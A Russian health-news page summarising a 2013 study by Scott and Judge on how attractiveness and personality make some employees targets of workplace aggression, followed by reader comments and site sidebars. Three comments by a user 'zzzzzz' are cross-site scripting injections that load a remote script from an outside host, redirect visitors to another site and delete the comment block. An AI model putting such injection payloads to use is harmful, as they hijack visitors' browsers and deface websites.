Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как ваша внешность влияет...  >>  Как ваша внешность влияет на вашу должность?
 
Обратная связь
 

Как ваша внешность влияет на вашу должность?

Размер шрифта
12 сентября 2013 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Случайно ли сотрудники с самой непривлекательной внешностью становятся мишенью для насмешек в офисе? Ученые утверждают, что нет.

Как ваша внешность влияет на вашу должность?

Ученые Брент А. Скотт и Тимоти Джадж попытались выяснить, отчего возникает это пресловутое контрпродуктивное поведение на работе (КПР) – поведение, направленное во вред организации или другим членам организации. В частности, исследователей интересовало, почему некоторые сотрудники становятся объектом оскорблений, агрессии и антиобщественного поведения на работе.

Ученые предположили, что попадание работника в число жертв КПР зависит, в первую очередь, от его личностных характеристик, внешности и негативных эмоций, которые они вызывают у коллег. Скотт и Джадж выделили следующие условные параметры, которые могут подстегнуть агрессию сотрудников: невротическое состояние «мишени» (расстройство, сопровождающееся приступами гнева, враждебностью, повышенной чувствительностью и тревожностью); готовность помочь окружающим и тактичность; физическая привлекательность (по мнению окружающих).

Ох уж эти красавчики

В ходе исследования оказалось, что физически непривлекательные сотрудники, которые ведут себя неприветливо на работе и не желают помогать окружающим, вызывают больше отрицательных эмоций у коллектива, и, следовательно, агрессию.

Разумеется, ни для кого не открытие, что с «невротиками» и «ворчунами» могут грубо обойтись в местном буфете, а вот то, что с «красавчиками» все ведут себя добродушнее, вызывает удивление. Скотт и Джадж заметили, что физически привлекательных людей окружающие считают более дружелюбными и приятными в общении, чем тех их коллег, которым не повезло с внешностью.

Ученые связывают этот феномен с тем, что красивые люди эстетически привлекательны для окружающих, в то время как люди с проблемной внешностью эстетически неприятны коллективу и вызывают отрицательные эмоции.

Зачем нам это знать

Исследователи надеются, что результаты их наблюдений помогут менеджерам по персоналу предугадывать, кто из работников может стать жертвой коллектива, а также предотвращать и пресекать агрессию.

Разумеется, непросто улучшить чью-то внешность или сделать поведение в коллективе более располагающим, однако хотим мы этого или нет, физическая привлекательность и характер играют важную роль на работе, и следует об этом помнить.

В детстве мы слышали, что «важно то, что внутри». Что ж, теперь мы знаем, что «то, что снаружи» играет не меньшую роль, по крайней мере, в офисной курилке.

Если вы заботитесь о своей внешности – специально для вас наш проект Хочу быть красивой!

Вы даже можете принять участие в телевизионном проекте в программе Здоровье с Еленой Малышевой!

Материалы данного исследования были опубликованы в журнале «Поведение человека» (Human Performance).

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

12 сентября 2013 в 08:37

Цитировать   |   Пожаловаться

Тоже мне открытие. Это уже давно известно. Гало-эффект называется.

2 - zzzzzz

30 июня 2015 в 19:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 19:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 23:04

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Селфи убивает больше людей, чем акулы!   Почему россияне едут лечиться за рубеж   Почему магазины могут обмануть людей, но не обезьян?   Действительно ли, смех – лучшее лекарство?! Можно ли мультиками вылечить болезнь?  
22 июля 2013Хотите заболеть шизофренией – попробуйте свинец! Свинец вызывает шизофрению 19 июля 2013У вашего мужа в 3 раза больше шансов совершить самоубийство! А какой шанс у вас?
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Грусть или смертельная болезнь
Может ли головная боль привести к смерти
Странные сигналы вашего организма

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.